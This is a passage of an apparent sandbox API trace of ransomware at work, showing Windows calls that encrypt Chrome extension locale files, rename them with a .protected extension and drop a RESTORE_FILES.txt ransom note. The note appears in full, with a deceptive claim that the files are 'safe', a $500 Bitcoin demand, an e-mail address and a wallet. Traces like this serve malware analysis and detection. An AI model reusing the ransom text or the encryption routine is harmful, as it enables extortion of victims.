pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.protected") returned 169 [0081.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.protected")) returned 1 [0081.123] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.123] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.123] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\RESTORE_FILES.txt") returned 163 [0081.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.123] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.123] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.124] lstrlenA (lpString="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") returned 684 [0081.124] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.124] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.124] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.124] CloseHandle (hObject=0x164) returned 1 [0081.124] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.124] lstrcmpiW (lpString1="nb", lpString2="Windows") returned -1 [0081.124] lstrcmpiW (lpString1="nb", lpString2="Program Files") returned -1 [0081.124] lstrcmpiW (lpString1="nb", lpString2="Program Files (x86)") returned -1 [0081.124] lstrcmpiW (lpString1="nb", lpString2="$Recycle.bin") returned 1 [0081.124] lstrcmpiW (lpString1="nb", lpString2="System Volume Information") returned -1 [0081.124] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb") returned 145 [0081.124] lstrcmpW (lpString1="nb", lpString2=".") returned 1 [0081.124] lstrcmpW (lpString1="nb", lpString2="..") returned 1 [0081.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\*") returned 147 [0081.124] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.124] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.125] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.125] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.125] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.125] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.125] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\.") returned 147 [0081.125] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.125] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.125] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.125] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.125] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.125] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.125] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.125] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\..") returned 148 [0081.125] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.125] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.125] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.125] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.125] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.125] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.125] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.125] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.125] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json") returned 159 [0081.125] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.125] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.125] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.125] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json") returned 159 [0081.125] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json") returned 159 [0081.125] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json") returned 159 [0081.125] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.126] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x284, lpOverlapped=0x0) returned 1 [0081.127] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.127] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x284, lpOverlapped=0x0) returned 1 [0081.127] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.127] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.127] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.127] CloseHandle (hObject=0x168) returned 1 [0081.127] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.protected") returned 169 [0081.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.protected")) returned 1 [0081.128] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.128] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.128] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\RESTORE_FILES.txt") returned 163 [0081.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.128] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.128] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.129] lstrlenA (lpString="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") returned 684 [0081.129] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.129] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.129] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.129] CloseHandle (hObject=0x164) returned 1 [0081.129] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.129] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0081.129] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0081.130] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0081.130] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0081.130] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0081.130] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl") returned 145 [0081.130] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0081.130] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0081.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\*") returned 147 [0081.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.130] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.130] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.130] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.130] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.130] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\.") returned 147 [0081.130] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.130] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.130] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.130] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.130] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.130] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.130] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\..") returned 148 [0081.130] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.130] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.130] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.130] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.130] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.130] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json") returned 159 [0081.130] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.130] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.131] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.131] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json") returned 159 [0081.131] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json") returned 159 [0081.131] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.132] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json") returned 159 [0081.132] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.132] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0081.133] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.133] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0081.133] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.133] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.133] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.133] CloseHandle (hObject=0x168) returned 1 [0081.133] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.protected") returned 169 [0081.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.protected")) returned 1 [0081.134] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.134] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.134] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\RESTORE_FILES.txt") returned 163 [0081.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
